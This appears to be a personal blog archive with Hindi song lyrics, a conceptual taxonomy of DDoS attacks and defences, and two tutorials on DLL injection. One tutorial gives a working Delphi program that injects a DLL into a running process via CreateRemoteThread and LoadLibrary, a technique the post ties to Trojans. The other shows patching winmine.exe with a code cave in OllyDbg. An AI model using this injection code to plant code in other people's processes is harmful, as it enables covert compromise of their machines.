Come To My World Of Computers

Humsafar

2010-10-14T21:07:00.000-07:00

Teri zulfoon ki , naram chon me,naram chaon me , khoya rehta hoon , khoya rehta hoon hamsafar,
Aur aise hi, haan haan aise hi pyar dikhta hai meri ankhon me, meri aaaankhon me humsfar,

Teri saanon ki ,garam aahat me , garam aahat me , soya rehtahun oya rehta hun humsafar,
Aur aise hi, haan haan aise hi ,main toh khota hun , main bhi khota hun humsafar,

Teri aankhon ki sargoshi me , sargoooshi me , dooba rehta hun , dooba rehta hun humafar ,
Aur aise hi, haan haan aise hi main toh jhumta hun main bhi jhumta hun hamsaar,

Teri duriyoon ka ehsaas hota hai , ehsaas hota hai , dil bhi marta hai haan ji mart hai humafar ,
Aur aise hi, haan haan aise hi pyaar bhta hai haan jee badhta hai humsafar ,

DDoS Attacks and DDoS Defense Mechanisms

2009-06-23T23:37:00.000-07:00

Introduction

Distributed denial-of-service attacks (DDoS) pose an immense threat to the Internet, and consequently many defense mechanisms have been proposed to combat them. Attackers constantly modify their tools to bypass these security systems, and researchers in turn modify their approaches to handle new attacks.The DDoS field is evolving quickly, and it is becoming increasingly hard to grasp a global view of the problem.

DDoS Attack Overview

A denial-of-service attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. A distributed denial-of-service attack deploys multiple machines to attain this goal. The service is denied by sending a stream of packets to a victim that either consumes some key resource, thus rendering it unavailable to legitimate clients, or provides the attacker with unlimited access to the victim machine so he can inflict arbitrary damage. This section will answer the following questions:

1. What makes DDoS attacks possible?
2. How do these attacks occur?
3. Why do they occur?

Internet Architecture

The Internet is managed in a distributed manner; therefore no common policy can be enforced among its participants.Such design opens several security issues that provide opportunities for distributed denial-of-service attacks:

1. Internet security is highly interdependent. DDoS attacks are commonly launched from systems that are subverted through security related compromises. Regardless of how well secured the victim system may be, its susceptibility to DDoS attacks depends on the state of security in the rest of the global Internet.

2. Internet resource is limited. Each Internet host has limited resources that can be consumed by a sufficient number of users.

3. Power of many is greater than power of few. Coordinated and simultaneous malicious actions by some participants can always be detrimental to others, if the resources of the attackers are greater than the resources of the victims.

4. Intelligence and resources are not collocated an end-to-end communication paradigm led to locating most of the intelligence needed for service guarantees with end hosts. At the same time, a desire for large throughput led to the design of high bandwidth pathways in the intermediate network. Thus, malicious clients can misuse the abundant resources of unwitting network for delivery of numerous messages to a victim.

DDoS Attack Strategy

In order to perform a distributed denial-of-service attack, the attacker needs to recruit the multiple agent (slave) machines. This process is usually performed automatically through scanning of remote machines, looking for security holes that would enable subversion. Vulnerable machines are then exploited by using the discovered vulnerability to gain access to the machine, and they are infected with the attack code. The exploit/infection phase is also automated, and the infected machines can be used for further recruitment of new agents .Agent machines perform the attack against the victim. Attackers usually hide the identity of the agent machines during the attack through spoofing of the source address field in packets. The agent machines can thus be reused for future attacks.

DDoS Goals

The goal of a DDoS attack is to inflict damage on the victim, either for personal reasons (a significant number of DDoS attacks are against home computers, presumably for purposes of revenge), for material gain (damaging competitor's resources) or for popularity (successful attacks on popular Web servers gain the respect of the hacker community).

Taxonomy of DDoS Attacks

In order to devise a taxonomy of distributed denialof- service attacks we observe the means used to prepare and perform the attack, the characteristics of the attack itself and the effect it has on the victim. Various classification criteria are indicated in bold type. Figure 1 summarizes the taxonomy.

Classification by Degree of Automation

During the attack preparation, the attacker needs to locate prospective agent machines and infect them with the attack code. Based on the degree of automation of the attack, we differentiate between manual, semi-automatic and automatic DDoS attacks.

Manual Attacks
Only the early DDoS attacks belonged to the manual category. The attacker scanned remote machines for vulnerabilities, broke into them and installed the attack code, and then commanded the onset of the attack. All of these actions were soon automated, leading to development of semiautomatic DDoS attacks, the category where most contemporary attacks belong.

Semi-Automatic Attacks

In semi-automatic attacks, the DDoS network consists of handler (master) and agent (slave, daemon) machines. The attacker deploys automated scripts for scanning and compromise of those machines and installation of the attack code. He then uses handler machines to specify the attack type and the victim's address and to command the onset of the attack to agents, who send packets to the victim. Based on the communication mechanism deployed between agent and handler machines we divide semi-automatic attacks into attacks with direct communication and attacks with indirect communication.

Attacks with direct communication

During attacks with direct communication, the agent and handler machines need to know each other's identity in order to communicate. This is achieved by hard-coding the IP address of the handler machines in the attack code that is later installed on the agent. Each agent then reports its readiness to the handlers, who store its IP address in a file for later communication. The obvious drawback of this approach is that discovery of one compromised machine can expose the whole DDoS network. Also, since agents and handlers listen to network connections, they are identifiable by network scanners.

Attacks with indirect communication

Attacks with indirect communication deploy a level of indirection to increase the survivability of a DDoS network.Recent attacks provide the example of using IRC channels for agent/handler communication. The use of IRC services replaces the function of a handler, since the IRC channel offers sufficient anonymity to the attacker. Since DDoS agents establish outbound connections to a standard service port used by a legitimate network service, agent communications to the control point may not be easily differentiated from legitimate network traffic. The agents do not incorporate a listening port that is easily detectable with network scanners. An attacker controls the agents using IRC communications channels. Thus, discovery of a single agent may lead no further than the identification of one or more IRC servers and channel names used by the DDoS network. From there, identification of the DDoS network depends on the ability to track agents currently connected to the IRC server. Although the IRC service is the only current example of indirect communication, there is nothing to prevent attackers from subverting other legitimate services for similar purposes.

Automatic Attacks

Automatic DDoS attacks additionally automate the attack phase, thus avoiding the need for communication between attacker and agent machines. The time of the onset of the attack,
attack type, duration and victim's address is preprogrammed in the attack code. It is obvious that such deployment mechanisms offer minimal exposure to the attacker, since he is only involved in issuing a single command – the start of the attack script. The hard coded attack specification suggests a single-purpose use of the DDoS network. However, the propagation mechanisms usually leave the backdoor to the compromised DDoS machine open, enabling easy future access and modification of the attack code. Both semi-automatic and automatic attacks recruit the agent machines by deploying automatic scanning and propagation techniques. Based on the scanning strategy, we differentiate between attacks that deploy random scanning, hit list scanning, topological scanning, permutation scanning and local subnet scanning. Attackers usually combine the scanning and exploitation phases, thus gaining a larger agent population, and my description of scanning techniques relates to this model.

Attacks with Random Scanning

During random scanning each compromised host probes random addresses in the IP address space, using a different seed. This potentially creates a high traffic volume since many machines probe the same addresses. Code Red (CRv2) performed random scanning .

Attacks with Hitlist Scanning

A machine performing hitlist scanning probes all addresses from an externally supplied list. When it detects the vulnerable machine, it sends one half of the initial hitlist to the recipient and keeps the other half. This technique allows for great propagation speed (due to exponential spread) and no collisions during the scanning phase. An attack deploying hitlist scanning could obtain the list from netscan.org of domains that still support directed IP broadcast and can thus be used for a Smurf attack.

Attacks with Topological Scanning

Topological scanning uses the information on the compromised host to select new targets. All mail worms use topological scanning, exploiting the information from address books for their spread.

Attacks with Permutation Scanning

During permutation scanning, all compromised machines share a common pseudo-random permutation of the IP address space; each IP address is mapped to an index in this permutation. A machine begins scanning by using the index computed from its IP address as a starting point. Whenever it sees an already infected machine, it chooses a new random start point. This has the effect of providing a semi coordinated, comprehensive scan while maintaining the benefits of random probing. This technique is described in as not yet deployed.

Attacks with Local Subnet Scanning

Local subnet scanning can be added to any of the previously described techniques to preferentially scan for targets that reside on the same subnet as the compromised host. Using this technique, a single copy of the scanning program can compromise many vulnerable machines behind a firewall. Code Red II and Nimda Worm used local subnet scanning. Based on the attack code propagation mechanism, we differentiate between attacks that deploy central source propagation, back-chaining propagation and autonomous propagation .

Attacks with Central Source Propagation

During central source propagation, the attack code resides on a central server or set of servers.
After compromise of the agent machine, the code is downloaded from the central source through a file transfer mechanism. The 1i0n worm operated in this manner.

Attacks with Back-chaining Propagation

During back-chaining propagation, the attack code is downloaded from the machine that was used to exploit the system.The infected machine then becomes the source for the next propagation step. Back-chaining propagation is more survivable than central-source propagation since it avoids a single point of failure. The Ramen worm and Morris Worm used backchaining propagation.

Attacks with Autonomous Propagation

Autonomous propagation avoids the file retrieval step by injecting attack instructions directly into the target host during the exploitation phase. Code Red, Warhol Worm and numerous E-mail worms use autonomous propagation.

Classification by Exploited Vulnerability

Distributed denial-of-service attacks exploit different strategies to deny the service of the victim to its clients. Based on the vulnerability that is targeted during an attack, we differentiate between protocol attacks and brute-force attacks.

Protocol Attacks

Protocol attacks exploit a specific feature or implementation bug of some protocol installed at the victim in order to consume excess amounts of its resources. Examples include the TCP SYN attack, the CGI request attack and the authentication server attack. In the TCP SYN attack, the exploited feature is the allocation of substantial space in a connection queue immediately upon receipt of a TCP SYN request. The attacker initiates multiple connections
that are never completed, thus filling up the connection queue indefinitely. In the CGI request attack, the attacker consumes the CPU time of the victim by issuing multiple CGI requests. In the authentication server attack, the attacker exploits the fact that the signature verification process consumes significantly more resources than bogus signature generation. He sends numerous bogus authentication requests to the server, tying up its resources.

Brute-force Attacks

Brute-force attacks are performed by initiating a vast amount of seemingly legitimate transactions. Since an upstream network can usually deliver higher traffic volume than the victim network can handle, this exhausts the victim's resources. We further divide brute-force attacks based on the relation of packet contents with victim services into filterable and non-filterable attacks.

Filterable Attacks

Filterable attacks use bogus packets or packets for non-critical services of the victim's operation, and thus can be filtered by a firewall. Examples of such attacks are a UDP flood attack or an
ICMP request flood attack on a Web server.

Non-filterable Attacks

Non-filterable attacks use packets that request legitimate services from the victim. Thus, filtering all packets that match the attack signature would lead to an immediate denial of the specified service to both attackers and the legitimate clients. Examples are a HTTP request flood targeting a Web server or a DNS request flood targeting a name server. The line between protocol and brute force attacks is thin. Protocol attacks also overwhelm a victim's resources with excess traffic, and badly designed protocol features at remote hosts are frequently used to perform "reflector" brute-force attacks, such as the DNS request attack or the Smurf attack. The difference is that a victim can mitigate the effect of protocol attacks by modifying the deployed protocols at its site, while it is helpless against brute-force attacks due to their misuse of legitimate services (non-filterable attacks) or due to its own limited resources (a victim can do nothing about an attack that swamps its network bandwidth). Countering protocol attacks by modifying the deployed protocol pushes the corresponding attack mechanism into the brute-force category. For example, if the victim deploys TCP SYN cookies to combat TCP SYN attacks, it will still be vulnerable to TCP SYN attacks that generate more requests than its network can accommodate. However, the brute-force attacks need to generate a much higher volume of attack packets than protocol attacks, to inflict damage at the victim. So by modifying the deployed protocols the victim pushes the vulnerability limit higher. Evidently, classification of the specific attack needs to take into account both the attack mechanisms used and the victim's configuration. It is interesting to note that the variability of attack packet contents is determined by the exploited vulnerability. Packets comprising protocol and non-filterable brute force attacks must specify some valid header fields and possibly some valid contents. For example TCP SYN attack packets cannot vary the protocol or flag field, and HTTP flood packets must belong to an established TCP connection and therefore cannot spoof source addresses, unless they hijack connections from legitimate clients.

Classification by Attack Rate Dynamics

Depending on the attack rate dynamics we differentiate between continuous rate and variable rate attacks.

Continuous Rate Attacks

The majority of known attacks deploy a continuous rate mechanism. After the onset is commanded, agent machines generate the attack packets with full force. This sudden packet flood disrupts the victim's services quickly, and thus leads to attack detection.

Variable Rate Attacks

Variable rate attacks are more cautious in their engagement, and they vary the attack rate to avoid detection and response. Based on the rate change mechanism we differentiate between attacks with increasing rate and fluctuating rate
.
Increasing Rate Attacks

Attacks that have a gradually increasing rate lead to a slow exhaustion of victim's resources. A state change of the victim could be so gradual that its services degrade slowly over a long time period, thus delaying detection of the attack.

Fluctuating Rate Attacks

Attacks that have a fluctuating rate adjust the attack rate based on the victim's behavior, occasionally relieving the effect to avoid detection. At the extreme end, there is the example of pulsing attacks. During pulsing attacks, agent hosts periodically abort the attack and resume it at a later time. If this behavior is simultaneous for all agents, the victim experiences periodic service disruptions. If, however, agents are divided into groups who coordinate so that one group is always active, then the victim experiences continuous denial of service.

Classification by Impact

Depending on the impact of a DDoS attack on the victim we differentiate between disruptive and degrading attacks.

Disruptive Attacks

The goal of disruptive attacks is to completely deny the victim's service to its clients. All currently known attacks belong to this category.

Degrading Attacks

The goal of degrading attacks would be to consume some (presumably constant) portion of a victim's resources. Since these attacks do not lead to total service disruption, they could remain undetected for a significant time period. On the other hand, damage inflicted on the victim could be immense. For example, an attack that effectively ties up 30% of the victim's resources would lead to denial of service to some percentage of customers during high load periods, and possibly slower average service. Some customers, dissatisfied with the quality, would consequently change their service provider and victim would thus lose income. Alternately, the false load could result in a victim spending money to upgrade its servers and networks.

Taxonomy of DDoS Defense Mechanisms

The seriousness of the DDoS problem and the increased frequency of DDoS attacks have led to the advent of numerous DDoS defense mechanisms. Some of these mechanisms address a specific kind of DDoS attack such as attacks on Web servers or authentication servers. Other approaches attempt to solve the entire generic DDoS problem. Most of the proposed approaches require certain features to achieve their peak performance, and will perform quite differently if deployed in an environment where these requirements are not met.
As is frequently pointed out, there is no "ram ban (means the weapon which never misses the target in hindi)" against DDoS attacks. Therefore we need to understand not only each existing DDoS defense approach, but also how those approaches might be combined together to effectively and completely solve the problem.

Classification by Activity Level

Based on the activity level of DDoS defense mechanisms, we differentiate between preventive and reactive mechanisms.

Preventive Mechanisms

The goal of preventive mechanisms is either to eliminate the possibility of DDoS attacks altogether or to enable potential victims to endure the attack without denying services to legitimate clients. According to these goals we further divide preventive mechanisms into attack prevention and denial-of-service prevention mechanisms.

Attack Prevention Mechanisms
Attack prevention mechanisms modify the system configuration to eliminate the possibility of a DDoS attack. Based on the target they secure, we further divide them into system security and protocol security mechanisms.

System Security Mechanisms

System security mechanisms increase the overall security of the system, guarding against illegitimate accesses to the machine, removing application bugs and updating protocol installations to prevent intrusions and misuse of the system. DDoS attacks owe their power to large numbers of subverted machines that cooperatively generate the attack streams. If these machines were secured, the attackers would lose their army and the DDoS threat would then disappear. On the other hand, systems vulnerable to intrusions can themselves become victims of DDoS attacks in which the attacker, having gained unlimited access to the machine, deletes or alters its contents. Potential victims of DDoS attacks can be easily overwhelmed if they deploy vulnerable protocols. Examples of system security mechanisms include monitored access to the machine, applications that download and install security patches, firewall systems, virus scanners, intrusion detection systems, access lists for critical resources, capability-based systems and client-legitimacy-based systems. The history of computer security suggests that this approach can never be 100% effective, but doing a good job here will certainly decrease the frequency and strength of DDoS attacks.

Protocol Security Mechanisms

Protocol security mechanisms address the problem of bad protocol design. Many protocols contain operations that are cheap for the client but expensive for the server. Such protocols can be misused to exhaust the resources of a server by initiating large numbers of simultaneous transactions. Classic misuse examples are the TCP SYN attack, the authentication server attack, and the fragmented packet attack, in which the attacker bombards the victim with malformed packet fragments forcing it to waste its resources on reassembling attempts. Examples of protocol security mechanisms include guidelines for a safe protocol design in which resources are committed to the client only after sufficient authentication is done , or the client has paid a sufficient price , deployment of powerful proxy server that completes TCP connections , etc. Deploying comprehensive protocol and system security mechanisms can make the victim completely resilient to protocol attacks. Also, these approaches are inherently compatible with and complementary to all other approaches.
Denial-of-service prevention mechanisms enable the victim to endure attack attempts without denying service to legitimate clients. This is done either by enforcing policies for resource consumption or by ensuring that abundant resources exist so that legitimate clients will not be affected by the attack. Consequently, based on the prevention method, we differentiate between resource accounting and resource multiplication mechanisms.

Resource Accounting Mechanisms

Resource accounting mechanisms police the access of each user to resources based on the privileges of the user and his behavior. Such mechanisms guarantee fair service to legitimate well-behaving users. In order to avoid user identity theft, they are usually coupled with legitimacy-based access mechanisms that verify the user's identity. Approaches proposed in illustrate resource accounting mechanisms.

Resource Multiplication Mechanisms

Resource multiplication mechanisms provide an abundance of resources to counter DDoS threats. The straightforward example is a system that deploys a pool of servers with a load balancer and installs high bandwidth links between itself and upstream routers. This approach essentially raises the bar on how many machines must participate in an attack to be effective. While not providing perfect protection, for those who can afford the costs, this approach has often proven sufficient. For example, Microsoft has used it to weather large DDoS attacks.

Reactive Mechanisms

Reactive mechanisms strive to alleviate the impact of an attack on the victim. In order to attain this goal they need to detect the attack and respond to it. The goal of attack detection is to detect every attempted DDoS attack as early as possible and to have a low degree of false positives. Upon attack detection, steps can be taken to characterize the packets belonging to the attack stream and provide this characterization to the response mechanism. We classify reactive mechanisms based on the attack detection strategy into mechanisms that deploy pattern detection, anomaly detection, hybrid detection, and third-party detection.

Mechanisms with Pattern Attack Detection

Mechanisms that deploy pattern detection store the signatures of known attacks in a database. Each communication is monitored and compared with database entries to discover occurrences of DDoS attacks. Occasionally, the database is updated with new attack signatures. The obvious drawback of this detection mechanism is that it can only detect known attacks, and it is usually helpless against new attacks or even slight variations of old attacks that cannot be matched to the stored signature. On the other hand, known attacks are easily and reliably detected, and no false positives are encountered

Mechanisms with Anomaly Attack Detection

Mechanisms that deploy anomaly detection have a model of normal system behavior, such as a model of normal traffic dynamics or expected system performance. The current state of the system is periodically compared with the models to detect anomalies. Approaches presented in provide examples of mechanisms that use anomaly detection. The advantage of anomaly detection over pattern detection is that unknown attacks can be discovered. However, anomaly-based detection has to address two issues:

1. Threshold setting. Anomalies are detected when the current system state differs from the model by a certain threshold. The setting of a low threshold leads to many false positives, while a high threshold reduces the sensitivity of the detection mechanism.

2. Model update. Systems and communication patterns evolve with time, and models need to be updated to reflect this change. Anomaly based systems usually perform automatic model update using statistics gathered at a time when no attack was detected. This approach makes the detection mechanism vulnerable to increasing rate attacks that can mistrial models and delay or even avoid attack detection.

Mechanisms with Hybrid Attack Detection

Mechanisms that deploy hybrid detection combine the pattern-based and anomaly-based detection, using data about attacks discovered through an anomaly detection mechanism to devise new attack signatures and update the database. Many intrusion detection systems use hybrid detection. If these systems are fully automated, properly extracting a signature from a detected attack can be challenging. The system must be careful not to permit attackers to fool it into detecting normal behavior as an attack signature, or the system itself becomes a denial-of-service tool.

Mechanisms with Third-Party Attack Detection

Mechanisms that deploy third-party detection do not handle the detection process themselves, but rely on an external message that signals the occurrence of the attack and provides attack characterization. Examples of mechanisms that use third-party detection are easily found among trace back mechanisms The goal of the attack response is to relieve the impact of the attack on the victim, while imposing minimal collateral damage to legitimate clients of the victim. I classify reactive mechanisms based on the response strategy into mechanisms that deploy agent identification, rate-limiting, filtering and reconfiguration approaches.

Agent Identification Mechanisms

Agent identification mechanisms provide the victim with information about the identity of the machines that are performing the attack. This information can then be combined with other response approaches to alleviate the impact of the attack. Agent identification examples include numerous trace back techniques and approaches that eliminate spoofing thus enabling use of the source address field for agent identification.

Rate-Limiting Mechanisms

Rate-limiting mechanisms impose a rate limit on a stream that has been characterized as malicious by the detection mechanism. Examples of rate limiting mechanisms are found in Rate limiting is a lenient response technique that is usually deployed when the detection mechanism has a high level of false positives or cannot precisely characterize the attack stream. The disadvantage is that they allow some attack traffic through, so extremely high scale attacks might still be effective even if all traffic streams are rate-limited.

Filtering Mechanisms

Filtering mechanisms use the characterization provided by a detection mechanism to filter out the attack stream completely. Examples include dynamically deployed firewalls , and also a commercial system Traffic Master . Unless detection strategy is very reliable, filtering mechanisms run the risk of accidentally denying service to legitimate traffic. Worse, clever attackers might leverage them as denial-of service tools.

Reconfiguration Mechanisms

Reconfiguration mechanisms change the topology of the victim or the intermediate network to either add more resources to the victim or to isolate the attack machines. Examples include reconfigurable overlay networks, resource replication services, attack isolation strategies etc. Reactive DDoS defense mechanisms can perform detection and response either alone or in cooperation with other entities in the Internet. Based on the cooperation degree we differentiate between autonomous, cooperative and interdependent mechanisms.

Autonomous Mechanisms

Autonomous mechanisms perform independent attack detection and response. They are usually deployed at a single point in the Internet and act locally. Firewalls and intrusion detection systems provide an easy example of autonomous mechanisms.

Cooperative Mechanisms

Cooperative mechanisms are capable of autonomous detection and response, but can achieve significantly better performance through cooperation with other entities. Mechanisms deploying pushback provide examples of cooperative mechanisms. They detect the occurrence of a DDoS attack by observing congestion in a router's buffer, characterize the traffic that creates the congestion, and act locally to impose a rate limit on that traffic. However, they achieve significantly better performance if the rate limit requests can be propagated to upstream routers who otherwise may be unaware of the attack.

Interdependent Mechanisms

Interdependent mechanisms cannot operate autonomously; they rely on other entities either for attack detection or for efficient response. Traceback mechanisms provide examples of interdependent mechanisms. A traceback mechanism deployed on a single router would provide almost no benefit.

Classification by Deployment Location

With regard to a deployment location, we differentiate between DDoS mechanisms deployed at the victim, intermediate, or source network.

Victim-Network Mechanisms

DDoS defense mechanisms deployed at the victim network protect this network from DDoS attacks and respond to detected attacks by alleviating the impact on the victim. Historically, most defense systems were located at the victim since it suffered the greatest impact of the attack and was therefore the most motivated to sacrifice some resources for increased security. Resource accounting and protocol security mechanisms provide examples of these systems.

Intermediate-Network Mechanisms

DDoS defense mechanisms deployed at the intermediate network provide infrastructural service to a large number of Internet hosts. Victims of DDoS attacks can contact the infrastructure and request the service, possibly providing adequate compensation. Pushback and traceback techniques are examples of intermediate-network mechanisms.

Source-Network Mechanisms

The goal of DDoS defense mechanisms deployed at the source network is to prevent customers using this network from generating DDoS attacks. Such mechanisms are necessary and desirable, but motivation for their deployment is low since it is unclear who would pay the expenses associated with this service. Mechanisms proposed in provide examples of source-network mechanisms.

REFRENCE

References
http://www.cert.org/tech_tips/denial_of_service.html
http://www.cert.org/archive/pdf/DoS_trends.pdf
http://www.cert.org/incident_notes/IN-2001-08.html
http://www.cert.org/incident_notes/IN-2001-03.html
http://www.cert.org/incident_notes/IN-2001-01.html
http://www.cs.berkeley.edu/~nweaver/warhol.html
http://www.cert.org/incident_notes/IN-2001-09.html
http://www.cert.org/advisories/CA-2001-26.html
http://www.cert.org/incident_notes/IN-2000-04.html
http://www.cert.org/advisories/CA-1998-01.html
http://www.cisco.com/warp/public/707/newsflash.html
J. D. Howard, "An analysis of security incidents on the Internet,"
F. Kargl, J. Maier and M. Weber, "Protecting web servers from distributed denial of service attacks,"
J. D. Howard and T. A. Longstaff, "A common language for computer security incidents”
http://www.cert.org/research/taxonomy_988667.pdf
S. Axelsson, "Intrusion detection systems: A survey and taxonomy, “
K. Hafner and J. Markoff, Cyberpunk: Outlaws and hackers on the computer frontier
http://www.tripwire.com/products/servers/
http://www.usenix.org/publications/login/2000-7/apropos.html.
M. Franklin and A. Stubblefield, "An algebraic approach to IP Traceback”,
http://search.ietf.org/internet-drafts/draft-ietf-itrace-01.txt, Oct.
RFC 2267,
J. Leiwo, P. Nikander, and T. Aura, "Towards network denial of service resistant protocols
Wikipedia and
Credits-some articles by unknown hackers and my frinds (WAR10RD, DIGITAL, ICEBEAR 64 ETC)
Jelena , Martin and Peter

DYNAMIC DLL INJECTION

2009-04-18T00:09:00.000-07:00

As in my previous post I describe about the static dll injection Now we will look at the dynamic dll injection. which is mostly used by Trojan’s.
After a program has been executed, a process is created in the OS. When an attacker attempts to load code into the process memory space, then the attacker is using dynamic injection. When .dll libraries are loaded through dynamic injection, the process is known as dynamic dll injection.
Loading a .dll into a process.
For this we will install DiamondCS APM (Advanced Process Manipulation).or any other advanced process manipulator just Google it
After installation start APM.
you should see a list of running processes along with their Process ID number as we have seen in our static dll injection post. Select explorer.exe.
Make sure apm.dll is not present.If it is for some strange reason, right click on top of it and select Unload DLL.
Now right click on top of explorer.exe on the APM window and select Load DLL.Now select apm.dll from the APM directory.
It should show success.
Now use PE to make sure the dll has been loaded.
Advanced Process Manipulation lets you load dlls into processes
Injecting dlls dynamically
Microsoft's Platform SDK provides some API calls to manipulate processes. Let's look at a couple of them. Make sure you read it and understand it before proceeding:
OpenProcess: opens an existing process object
WriteProcessMemory: writes data to an area of memory in a specified process. The entire area to be written to must be accessible or the operation fails.
CreateRemoteThread: creates a thread that runs in the virtual address space of another process
LoadLibrary: maps the specified executable module into the address space of the calling process.
VirtualAllocEx: reserves or commits a region of memory within the virtual address space of a specified process
Open a process using OpenProcess. One of the parameters is the Process ID which you can get from using PE from my previous post of static dll injection. Next, Allocate memory using VirtualAllocEx (one of the parameters of VirtualAllocEx will be the process opened by OpenProcess)
Write something into the memory space we allocated within the process. We will pass in the Process into which we want to write, the address of the memory into which we want to write ,the number of bytes to write, and a pointer to the DLL we want to load.
Now we will create a new thread which will call a function. The address of the function is the address of LoadLibrary and as parameters we pass the address of the memory we allocated...so the process will call the code we injected into the process. We do this using CreateRemoteThread and passing in the addresses.
Follows a simple example
program ddlli;
uses
Windows;
var
PID, BytesWritten, Process, Thread, ThreadId: dword;
Paramaters: pointer;
DLL: pchar;
function xCreateRemoteThread(hProcess: dword; lpThreadAttributes: Pointer; dwStackSize: dword; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: dword; lpThreadId: dword): dword; stdcall; external 'RT.dll';
function xVirtualAllocEx(hProcess: dword; lpAddress: Pointer; dwSize: dword; flAllocationType: dword; flProtect: dword): Pointer; stdcall; external 'RT.dll';
function xVirtualFreeEx(hProcess: dword; lpAddress: Pointer; dwSize: dword; dwFreeType: dword): boolean; stdcall; external 'RT.dll';
begin
DLL := 'c:\Inject\Library.dll'; //full path!
PID := 1784; //process id!
Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Paramaters := xVirtualAllocEx(Process, nil, 4096, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(Process, Paramaters, Pointer(DLL), 4096, BytesWritten);
Thread := xCreateRemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Paramaters, 0, ThreadId);
WaitForSingleObject(Thread, INFINITE);
xVirtualFreeEx(Process, Paramaters, 0, MEM_RELEASE);
CloseHandle(Thread);
CloseHandle(Process);
end.
As soon as EXE.exe is executed an Internet Explorer window should come up.
The DLL in this example is actually not loaded because we are using Windows XP and there is a security issue with the isBadWritePtr() function. However in earlier versions of Windows it would have injected successfully.
This is all about dynamic dll injection
Reference:
www.microsoft.com
ECE lab manual
www.iamaphex.net (for codes)

STATIC DLL INJECTION

2009-03-17T23:18:00.000-07:00

INTRODUCTION

DEFINING DLL

according to microsoft "A DLL is a library that contains code and data that can be used by more than one program at the same time. For example, in Windows operating systems, the Comdlg32 DLL performs common dialog box related functions. Therefore, each program can use the functionality that is contained in this DLL to implement an Open dialog box. This helps promote code reuse and efficient memory usage.

By using a DLL, a program can be modularized into separate components. For example, an accounting program may be sold by module. Each module can be loaded into the main program at run time if that module is installed. Because the modules are separate, the load time of the program is faster, and a module is only loaded when that functionality is requested.

Additionally, updates are easier to apply to each module without affecting other parts of the program. For example, you may have a payroll program, and the tax rates change each year. When these changes are isolated to a DLL, you can apply an update without needing to build or install the whole program again.

The following list describes some of the files that are implemented as DLLs in Windows operating systems:

ActiveX Controls (.ocx) files

An example of an ActiveX control is a calendar control that lets you select a date from a calendar.

Control Panel (.cpl) files

An example of a .cpl file is an item that is located in Control Panel. Each item is a specialized DLL.

Device driver (.drv) files

An example of a device driver is a printer driver that controls the printing to a printer."

let us make this some more clearer than microsoft defination " A dynamic link library (DLL) is a collection of small programs, any of which can be called when needed by a larger program that is running in the computer. The small program that lets the larger program communicate with a specific device such as a printer or scanner is often packaged as a DLL program (usually referred to as a DLL file). DLL files that support specific device operation are known as device driver."

DEFINING DLL INJECTION

Code and DLL injection refer to a method for attackers to manipulate programs and processes to execute another program. DLL injection provides a manner for attributing the malicious .dll to running processes. Processes are tasks that are being handled by the operating system.

There are two kinds of injection:

Static injection - Static injection occurs prior to program execution.

Dynamic injection- Dynamic injection occurs when processes are loaded into memory.

HOW TO DO A STATIC DLL INJECTION

A file is altered, by 'injecting' a jump at the beginning of the filespace. This jump directs to arbitrary code written by an attacker into available space of the filespace of a program.

TOOLS WE USE

Sysinternal’s Process Explorer(PE)

OllyDbg

NOW INJECTION

We will now explore static code injection. For this purpose, we will manipulate the Windows game Mineswipper so that before it runs it displays a message saying “hi HL geeks”

First, go to C:\WINDOWS\system32 and make a copy of winmine.exe into a file with a different name (for security purpose)

In order to manipulate winmine.exe, we will use OllyDbg, “a 32-bit assembler level analysing debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable.”

The first time you run OllyDbg you might get a message asking you whether you want to update on the library (.dll) files. Just say no

Click Open, and open winmine.exe. What you will get in OllyDbg is assembly code of winmine.exe

On the right part of the screen you will see the Register values. The EIP register is a pointer to the next command that will execute. In this case it should store the Module Entry Point

The memory space of winmine.exe contains a lot of useful information, but it also contains areas with no useful information whatsoever. These areas are full of noop operations (\x00's). These areas could be modified to add code without corrupting winmine.exe.

In OllyDbg, on the left upper window (right below the menu), scroll down until you find a big group of noops put together where you have enough space to add your code. The place you find is called a 'cave',

Now in the 'cave' we found we will add a Message Box call.

The function call is:

MsgBoxA(0,”hi HL geeks”,”hi HL geeks”,0)

So this is the ASM code for doing that:

Push 0

Push “hi HL geeks”

Push 0

Call User32.MessageBoxA

In Machine Code we go to an even lower level...we must allocate space for the “hi HL geeks” string and then push the address of this allocated memory by doing a

Push

We will now add the code. Highlight a bunch (about 20) of NOOPs from the cave. Right click and select Binary->Edit. Now on the Ascii field simply type in “hi HL geeks”

You will now get some garbage on OllyDbg. Do not worry. Olly needs to reanalyze this code. Press CTRL + A to analyze the code. After this, you should see “hi HL geeks” in some address.

Now below the address where you added your string, double click on one of the “DB 00” fields. You will get an Assemble at

window.

Type in:

push 0

and press Assembler. A new Assemble at will appear. Now type in:

push MYADDRESS

where MYADDRESS is the address where your string is located. In the next address you should type:

push MYADDRESS

again (because you are pushing the same string 2 times, once for the header of the box once for the message in the box). On the next address we type in:

push 0

again. Finally we have to call the actual function call, so on the next address type:

call user32.MessageBoxA

Now press the '*' key in your numpad, this will take you to the top of the window (the origin). Select the first 6 instructions, highlight them and then press CTRL + C (for backup). Paste this code into notepad.

Now we will overwrite some code. Double click on the Origin instruction and type in:

JMP CODEADDRESS

where CODEADDRESS is the address where your code starts

You will notice that more than one line got edited. The edited lines will be in red. Compare the first few lines with your copy in Notepad and delete the lines that are duplicated from Notepad. The lines that are not duplicated we will need to add again somewhere.

It is important to keep this address because what the program will do is read the EIP register. This points to the line where we added the JMP. The JMP will redirect the PC to the new code. The new code will execute, and then we want to jump back to the address you just wrote down so that normal execution continues as if nothing had happened. However, before we return to normal execution, we have to add the code that we overwrote. So we add this at the end of our code before we jump back to the beginning of the code.

Go to back to the origin. Highlight the origin instruction, and right click with your mouse. Then press Follow. This will take you to the address to which the origin jumps. If you have done everything correctly so far, this should take you to the beginning of your code (The first push 0).

Now we need to add the code that was overwritten (which we copied in notepad,). Add the remaining instructions from notepad at the end (immediately after the Call MessageBox command).

Note: If it says something like 'PUSH winmine.1234567' in notepad, just type in 'push 1234567').

Now at the last line of the new code insert the command

JMP SECONDADDRESS

where SECONDADDRESS is the address of the second line, or the line after the origin

